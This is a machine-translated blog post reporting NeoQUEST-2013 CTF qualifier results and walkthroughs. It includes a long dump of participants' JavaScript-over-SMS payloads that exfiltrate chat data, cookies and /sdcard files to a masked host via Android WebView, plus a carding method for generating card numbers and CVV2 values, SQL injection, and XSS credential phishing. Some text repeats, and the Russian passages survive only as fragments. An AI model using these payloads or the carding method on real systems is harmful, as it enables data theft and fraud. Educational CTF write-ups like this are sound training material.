The results of the qualifying stage NeoQUEST-2013 and how to complete the tasks
Hello everyone from the team NeoQUEST-2013!
The qualifying stage has passed, and we are happy to summarize it. And the results are such that we could not restrict ourselves to the planned set of prizes and gifts, because there are many participants whose contributions are worth noting.
Under the cut summing up and description of tasks of the qualifying stage NeoQUEST – 2013.
Prizes will receive four participants (l33t, vos, AVictor, d90andrew), passed all tasks. The l33t stand apart - they participated in the team (in fact, the qualifying stage of NeoQUEST-2013 assumed individual participation), and we invented a separate team prize for them (the coolest nanodrome with a bunch of bugs ).
The AVictor participant has studied the task with Android (and not only him) along and across and promptly informed us about imaginable and unthinkable cheats, and therefore, in addition to the prize ( iPod Touch ), we also give him an additional gift ( bugs-bugs-bugs ) so that and further showed interest in finding bugs everywhere, always and in everything. Participants vos and d90andrew receive ASUS Transformer Pad Infinity TF700T and iPod Nano respectively.
Our special “jury sympathy prize” ( AR.Drone 2.0 ) goes to the tavel participant, who, although not all the tasks were completed, but sorted out the CVV2 generation algorithms (I am glad that experts of this level participate in NeoQUEST) and showed unprecedented zeal in passing the task with skipass.
In addition, all participants who have succeeded in completing the quest will receive memorable gifts from us, which this year will be sweeter and tastier than last year.
We will contact you personally (you indicated a valid e-mail address during registration) with all the participants who went to the second (full-time) tour NeoQUEST-2013, which will take place in the vicinity of St. Petersburg on July 10, 2013 to transfer prizes and gifts.
')
The participants had a traffic dump and a RAM dump. In traffic, an ftp session with a password-protected zip archive with a key.txt file is easily located. It remains only to find the password to the archive in the memory dump, which can be done in two ways: simple and very simple.
A simple way: using the strings utility, find all Unicode strings and compile a dictionary for password brute-force, and then opening the archive remains a technical matter.
A very simple way: if you make “ctrl + F” in the memory dump by the name of the archive “key.txt”, then a password will be found very close.
Tried to ignore during the development of the task, the bot-extrovert would gladly hand out his mobile number to all the interlocutors, in order to get more messages - after all, he sat in a chat from the web-muzzle and from the phone.
To please the poor fellow with attention, it was necessary to send an SMS, and if it passed by a regular expression, it was immediately added as an incoming message to the chat.
In addition to this feature, the application implemented the function of transmitting a file from an SD card through the server to the interlocutor (which, by the way, gave rise to a serious cheat with the Gulf of Shell, which even hosters noticed).
In the interface of the Android application, which is a WebView, all that was needed was a big red “send file” button, so the function had to be called independently via javascript, which could be pushed through SMS without any restrictions. But not any javascript with this method of insertion is performed, and since the Android bot was almost like a person (just as awfully curious and fearless), he gladly clicked on all the incoming buttons.
Algorithm for passing the task:
Such options were sent by participants:
Well, some people thought. In total, about 200 sms arrived (it was necessary to fasten a short number - and would earn extra money at the same time).
Some even wanted to talk verbally! It turned out a fun task.
We productively discussed the passage of this task with the participant tavel - and it is better not to write about the task. The correspondence is almost unchanged, but slightly reduced (I hope, tavel is not against and will not make me run through the courts):
tavel --------> NeoQUEST_support
NeoQUEST_support ------> tavel
The order of the job:
1. Log in to the site (nick / nick).
2. Learn BIN (IIN) of the Bank of St. Petersburg. There is 479769 in Google . You can get other BINs only if you have hidden channels (like, apparently, tavel) to the officially closed current BIN list.
3. Use the Moon algorithm and the CVV2 generation algorithm (for example, such CVV2 = 3DES (PAN [9], YYMM, 000) to generate PAN / CVV pairs. You could use the EFT Calculator program for this, slightly changing its source code.
4. Go through (of course, not manually) all several thousand options on the site in the form of buying a ticket. And with the correct data entry get the key to the entered mail.
Simple file manipulations can help in hiding transmitted information, especially if you don’t know where to look for it. We limited the search area a bit so that participants searched for a needle not in a haystack: "Nick lost the first 5 seconds, then a couple more seconds of the track from 2:40 and finally the last fragment from 3:42." This, of course, greatly simplified the task.
The word inserted in the mp3-file was divided into three parts.
The first segment is the word "RUM". We reproduced this word on the speech generator, then slowed it down and inverted it. Accordingly, the participants faced the opposite task.
The second segment is the word "GINAE". It was encoded by Morse code and strongly accelerated. If you listen to the segment carefully, you can immediately hear it, and then slow down the song on this segment and decode the Morse code.
The third segment - the word "IMA". In this segment, we specifically cut a certain range of frequencies and inserted a Morse code recorded at this frequency. Morzyanka sounded only in one channel and was muffled, so it was very difficult to hear it unarmed and armed with hearing without special manipulations. In mp3 tags a tip was left indicating the working frequency range of the Morse code: “Riped by fans for fans. Enjoy in 800-1000. If you use the parametric equalizer, for example, in Sound Forge, to raise the necessary frequencies, you can hear the Morse code and, having decoded it, get the desired piece.
The result is the word IMAGINAERUM, which is the name of one of the albums of the Nightwish group - the favorite group of the task's creator =). key = MD5 (IMAGINAERUM)
To implement the task, we used the server with FebOS operating system installed in our version, which simply didn’t have the tcp / ip stack and the protocol stack as such, so it didn’t respond to any requests except one: UDP on port 2112. We set delays in responding to messages arriving on this port, with the result that many utilities stopped detecting this port as open (in particular, nmap). You can detect it by running any scanner to scan all UDP ports and look at the answers in Wireshark (only one will come from port 2112). The main part of the task has been solved, then the matter of technology and entertainment is on. You need to coordinate the xml-protocol with the server by prompts:
(picture of the participant vos)
And win the bot in gomoku :
(picture of the participant vos)
This task almost completely repeated the situation with a real rather large site, which we recently conducted a pentest. Life comes up with everything for us, we just do not spoil.
The entry point is SQL-Injection, with which you can get information about site administrators (e-mail addresses and password hashes).
In addition to SQL-Injection, the site has passive xss. Using social engineering, it was possible to force the administrator to enter credentials (the admin was real, working from 10:00 to 18:00, and sometimes almost around the clock) by clicking on the link containing the XSS and sending you a login and password. Many of the participants who completed the tasks in this way, stubbornly tried to get cookies and did not want to use social engineering at all - although in life it was the person who most often was the weakest link.
We took the passwords of the site administrators, as well as the whole task, from life: not extremely complex, but not vocabulary (average length, the content of numbers, letters, symbols, etc.). Therefore, having received password hashes for administrators, one could quite successfully cope with the task of recovering them via md5-hash, which some users did.
Thanks to all participants! We hope you enjoyed it and that everyone learned something new and useful for themselves. I am glad that all the tasks have been completed, for which a special thank you to all the winners. We will meet with you at the NeoQUEST-2013 full-time stage, and wish you good luck in advance!
Thanks to the whole team involved in the creation of tasks: ainchorn, otanatari, macoeshka, bozzzon, denys, sergy, 3ka5_cat , etc. Special thanks to pushkin for supporting the entire infrastructure and, of course, Xandra for the excellent hospital design.
The qualifying stage has passed, and we are happy to summarize it. And the results are such that we could not restrict ourselves to the planned set of prizes and gifts, because there are many participants whose contributions are worth noting.
Under the cut summing up and description of tasks of the qualifying stage NeoQUEST – 2013.
Prizes will receive four participants (l33t, vos, AVictor, d90andrew), passed all tasks. The l33t stand apart - they participated in the team (in fact, the qualifying stage of NeoQUEST-2013 assumed individual participation), and we invented a separate team prize for them (the coolest nanodrome with a bunch of bugs ).
The AVictor participant has studied the task with Android (and not only him) along and across and promptly informed us about imaginable and unthinkable cheats, and therefore, in addition to the prize ( iPod Touch ), we also give him an additional gift ( bugs-bugs-bugs ) so that and further showed interest in finding bugs everywhere, always and in everything. Participants vos and d90andrew receive ASUS Transformer Pad Infinity TF700T and iPod Nano respectively.
Our special “jury sympathy prize” ( AR.Drone 2.0 ) goes to the tavel participant, who, although not all the tasks were completed, but sorted out the CVV2 generation algorithms (I am glad that experts of this level participate in NeoQUEST) and showed unprecedented zeal in passing the task with skipass.
In addition, all participants who have succeeded in completing the quest will receive memorable gifts from us, which this year will be sweeter and tastier than last year.
We will contact you personally (you indicated a valid e-mail address during registration) with all the participants who went to the second (full-time) tour NeoQUEST-2013, which will take place in the vicinity of St. Petersburg on July 10, 2013 to transfer prizes and gifts.
')
Description of tasks and methods of their passage
One page, two page (analysis of dumps)
The participants had a traffic dump and a RAM dump. In traffic, an ftp session with a password-protected zip archive with a key.txt file is easily located. It remains only to find the password to the archive in the memory dump, which can be done in two ways: simple and very simple.
A simple way: using the strings utility, find all Unicode strings and compile a dictionary for password brute-force, and then opening the archive remains a technical matter.
A very simple way: if you make “ctrl + F” in the memory dump by the name of the archive “key.txt”, then a password will be found very close.
The cost of the message is 18 cu VAT excluded (Android application reversing + javascript via SMS)
Tried to ignore during the development of the task, the bot-extrovert would gladly hand out his mobile number to all the interlocutors, in order to get more messages - after all, he sat in a chat from the web-muzzle and from the phone.
To please the poor fellow with attention, it was necessary to send an SMS, and if it passed by a regular expression, it was immediately added as an incoming message to the chat.
In addition to this feature, the application implemented the function of transmitting a file from an SD card through the server to the interlocutor (which, by the way, gave rise to a serious cheat with the Gulf of Shell, which even hosters noticed).
In the interface of the Android application, which is a WebView, all that was needed was a big red “send file” button, so the function had to be called independently via javascript, which could be pushed through SMS without any restrictions. But not any javascript with this method of insertion is performed, and since the Android bot was almost like a person (just as awfully curious and fearless), he gladly clicked on all the incoming buttons.
Algorithm for passing the task:
Such options were sent by participants:
-- /list -- ) -- ? -- , - . ! $18? :) . NQC fob: <img src=http://xxx.xxx.xxx.xxx:xxxx/inject> . NQC fob: ");var c =["my","your"];for(var k = 0; k < 2; k++){var msgs=document.getElementsByClassName(c[k]);for (var i = 0; i < msgs.length;i++){var cname = msgs[i].className;var childs=msgs[i].children;for(var j = 0; j < childs.length; j++)appendText("<img src=http://xxx.xxx.xxx.xxx:xxxx/"+cname+"/"+encodeURIComponent(childs[j]. innerText)+">");}};show("fob . NQC fob: ");var e=document.getElementsByClassName("tab");for(var i=0;i<e.length;i++)appendText("<img src=http://xxx.xxx.xxx.xxx:xxxx/"+encodeURIComponent(e[i].title)+">");show("admin 1 NQC Contacts:<img src="http://xxx.xxx.xxx/d.php" 1 NQC fob:","my");var i=new Image();i.src="http://xxx.xxx.xxx/d.php?d="+escape(findTab("fob").innerHTML);appendMsg("x"," 1 NQC fob:","my");var x=new XMLHttpRequest();x.open('POST','http://xxx.xxx.xxx/d.php',true);x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send("a="+encodeURIComponent(document.getElementsByTagName('body')[0].innerHTML));appendMsg("x"," 1 NQC x:","my");var s=document.createElement('script');s.src='http://xxx.xxx.xxx/1.txt';document.getElementsByTagName('head')[0].appendChild(s);clr(" 1 NQC x:","my");var s=escape(document.getElementsByTagName('body')[0].innerHTML);for(i=0;i<s.length;i+=99)window.Android.postMessage(s.substr(i,99),"_");clr(" 1 NQC fob:","my");var i=new Image();i.src="http://xxx.xxx.xxx/d.php?d="+escape(findTab("Contacts").innerHTML);appendMsg("x"," 1 NQC x:","my");var s=escape(findTab("Contacts").innerHTML);for(i=0;i<s.length;i+=99)window.Android.postMessage(s.substr(i,99),"_");clr(" 1 NQC x:","my");var s=document.createElement('script');s.src='http://xxx.xxx.xxx/d.php';document.getElementsByTagName('head')[0].appendChild(s);clr(" 1 NQC fob:<img src=\"http://xxx.xxx.xxx/d.php\"/> 1 NQC fob:","my");window.Android.sendFile("key.txt","AVictor");clr(" Q NQC " eval('q=new Image();q.src="http://xxx.xxx.xxx/image.php?" document.cookie;') " . NQC fob: "); document.body.innerHTML="<iframe width=100% height=100% frameborder=0 src=http://xxx.xxx.xxx.xxx:xxxx/l.html></iframe>";// Q NQC <img src="http://xxx.xxx.xxx/image.php?qwe"/>:hello Q NQC <img src="http://xxx.xxx.xxx/image.php?123">:hello Q NQC " eval('i=new Image();i.src="http://xxx.xxx.xxx/image.php?' document.cookie '";') ":hello Q NQC hello:<img src="http://xxx.xxx.xxx/image.php?qwe1"/> Q NQC " eval(';i=new Image();i.src="http://xxx.xxx.xxx/image.php?'; document.cookie ';";';) ":hello . NQC test: ");function snd(i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c += s;b = i.read();if(b<0 || (s=="\\n" && c.length>512)) {document.body.innerHTML+="<img src=http://xxx.xxx.xxx.xxx:xxxx/?"+encodeURIComponent(c)+">";c=""; }}}rt=Android.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null). invoke(null,null);snd(rt.exec(["/system/bin/ls","-R","/sdcard/"]).getInputStream());; show("test . NQC test: ");function snd(i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c += s;b = i.read();if(b<0 || c.length>31) {document.body.innerHTML+="<img src=http://xxx.xxx.xxx.xxx:xxxx/?"+encodeURIComponent(c)+">";c=""; }}}rt=Android.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null). invoke(null,null);snd(rt.exec(["/system/bin/ls","-R","/sdcard/"]).getInputStream());; show("test . NQC test: ");function snd(fn, i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c += s;b = i.read();if(b<0 || c.length > 32) {document.body.innerHTML+="<img src=http://xxx.xxx.xxx.xxx:xxxx/"+fn+"?"+encodeURIComponent(c)+">";c=""; }}}rt = Android.getClass().forName("java.lang.Runtime").getMethod( "getRuntime",null).invoke(null,null);snd("f", rt.exec(["/system/bin/cat", "/sdcard/flag"]).getInputStream());snd("ft", rt.exec(["/system/bin/cat", "/sdcard/flag.txt"]).getInputStream());snd("k", rt.exec(["/system/bin/cat", "/sdcard/key"]).getInputStream());snd("kt", rt.exec(["/system/bin/cat", "/sdcard/key.txt"]).getInputStream());;show("test . NQC xxx: ");Android.postMessage("xxx", "/, /.txt, key, key.txt"); // . NQC xxx: ");Android.postMessage("xxx", "/./.txt.key.key.txt"); // . NQC fob: ");Android.postMessage("file:///android_asset/key.txt", "xxx"); //;Android.postMessage( "xxx");"<img src=http://xxx.xxx.xxx.xxx:xxxxx/" fn "?" encodeURIComponent(c) ">"; -> {Android.postMessage( . NQC test: ");function snd(fn, i){var c = "";var b = i.read();while(b != -1) {var s = String.fromCharCode(b);c = s;b = i.read();if(b<0 Well, some people thought. In total, about 200 sms arrived (it was necessary to fasten a short number - and would earn extra money at the same time).
Some even wanted to talk verbally! It turned out a fun task.
There and back (carding)
We productively discussed the passage of this task with the participant tavel - and it is better not to write about the task. The correspondence is almost unchanged, but slightly reduced (I hope, tavel is not against and will not make me run through the courts):
tavel --------> NeoQUEST_support
-, - BIN, , 479768 479769, BIN : 479768;VISA;BANK SAINT PETERSBURG PLC;DEBIT;CLASSIC;RUSSIAN FEDERATION;RU;RUS;643;; 479769;VISA;BANK SAINT PETERSBURG PLC;DEBIT;CLASSIC;RUSSIAN FEDERATION;RU;RUS;643;; 479770;VISA;BANK SAINT PETERSBURG PLC;DEBIT;BUSINESS;RUSSIAN FEDERATION;RU;RUS;643;; 479771;VISA;BANK SAINT PETERSBURG PLC;CREDIT;PLATINUM;RUSSIAN FEDERATION;RU;RUS;643;; 479772;VISA;BANK SAINT PETERSBURG PLC;DEBIT;ELECTRON;RUSSIAN FEDERATION;RU;RUS;643;; 479773;VISA;BANK SAINT PETERSBURG PLC;DEBIT;PREMIER;RUSSIAN FEDERATION;RU;RUS;643;; , BIN . , 479769, , - . , .. 4 , BIN 1000 , , . 2000 . -: CVV2 , CVV, CVV2 , CVV 1- , . CVV, label "CVV2/CVC2", placeholder CVV, , , . , (http://dmitryga.ru/2013/640): CVV = 3DES(PAN[9], MMYY, ServiceCode) CVV2 = 3DES(PAN[9], YYMM, 000) -, , -, CVV2 - , 000. , - 101 , , CVV2. , (PAN) 9 ( BIN ), 16 , 2 , 8 , .. 64- , 64- , . , : 3DES 1- , 2- 1- , .. EDE , , , EEE, - , , EDE2.
NeoQUEST_support ------> tavel
CVV CVV2, , ( EDE ). , PAN, 128 , DES- XOR- . . . CVV, .. ( CVV2) , .
The order of the job:
1. Log in to the site (nick / nick).
2. Learn BIN (IIN) of the Bank of St. Petersburg. There is 479769 in Google . You can get other BINs only if you have hidden channels (like, apparently, tavel) to the officially closed current BIN list.
3. Use the Moon algorithm and the CVV2 generation algorithm (for example, such CVV2 = 3DES (PAN [9], YYMM, 000) to generate PAN / CVV pairs. You could use the EFT Calculator program for this, slightly changing its source code.
4. Go through (of course, not manually) all several thousand options on the site in the form of buying a ticket. And with the correct data entry get the key to the entered mail.
My first MP3 player (audio steganography)
Simple file manipulations can help in hiding transmitted information, especially if you don’t know where to look for it. We limited the search area a bit so that participants searched for a needle not in a haystack: "Nick lost the first 5 seconds, then a couple more seconds of the track from 2:40 and finally the last fragment from 3:42." This, of course, greatly simplified the task.
The word inserted in the mp3-file was divided into three parts.
The first segment is the word "RUM". We reproduced this word on the speech generator, then slowed it down and inverted it. Accordingly, the participants faced the opposite task.
The second segment is the word "GINAE". It was encoded by Morse code and strongly accelerated. If you listen to the segment carefully, you can immediately hear it, and then slow down the song on this segment and decode the Morse code.
The third segment - the word "IMA". In this segment, we specifically cut a certain range of frequencies and inserted a Morse code recorded at this frequency. Morzyanka sounded only in one channel and was muffled, so it was very difficult to hear it unarmed and armed with hearing without special manipulations. In mp3 tags a tip was left indicating the working frequency range of the Morse code: “Riped by fans for fans. Enjoy in 800-1000. If you use the parametric equalizer, for example, in Sound Forge, to raise the necessary frequencies, you can hear the Morse code and, having decoded it, get the desired piece.
The result is the word IMAGINAERUM, which is the name of one of the albums of the Nightwish group - the favorite group of the task's creator =). key = MD5 (IMAGINAERUM)
If there is a pack of cigarettes in your pocket (stealth server)
To implement the task, we used the server with FebOS operating system installed in our version, which simply didn’t have the tcp / ip stack and the protocol stack as such, so it didn’t respond to any requests except one: UDP on port 2112. We set delays in responding to messages arriving on this port, with the result that many utilities stopped detecting this port as open (in particular, nmap). You can detect it by running any scanner to scan all UDP ports and look at the answers in Wireshark (only one will come from port 2112). The main part of the task has been solved, then the matter of technology and entertainment is on. You need to coordinate the xml-protocol with the server by prompts:
(picture of the participant vos)
And win the bot in gomoku :
(picture of the participant vos)
“New Year is not a holiday for us” (c) Russian Post (web security)
This task almost completely repeated the situation with a real rather large site, which we recently conducted a pentest. Life comes up with everything for us, we just do not spoil.
The entry point is SQL-Injection, with which you can get information about site administrators (e-mail addresses and password hashes).
In addition to SQL-Injection, the site has passive xss. Using social engineering, it was possible to force the administrator to enter credentials (the admin was real, working from 10:00 to 18:00, and sometimes almost around the clock) by clicking on the link containing the XSS and sending you a login and password. Many of the participants who completed the tasks in this way, stubbornly tried to get cookies and did not want to use social engineering at all - although in life it was the person who most often was the weakest link.
We took the passwords of the site administrators, as well as the whole task, from life: not extremely complex, but not vocabulary (average length, the content of numbers, letters, symbols, etc.). Therefore, having received password hashes for administrators, one could quite successfully cope with the task of recovering them via md5-hash, which some users did.
Off the longing, under the feet of the board! (SCADA-system + search by pictures)
Acknowledgments
Thanks to all participants! We hope you enjoyed it and that everyone learned something new and useful for themselves. I am glad that all the tasks have been completed, for which a special thank you to all the winners. We will meet with you at the NeoQUEST-2013 full-time stage, and wish you good luck in advance!
Thanks to the whole team involved in the creation of tasks: ainchorn, otanatari, macoeshka, bozzzon, denys, sergy, 3ka5_cat , etc. Special thanks to pushkin for supporting the entire infrastructure and, of course, Xandra for the excellent hospital design.
Source: https://habr.com/ru/post/170679/
All Articles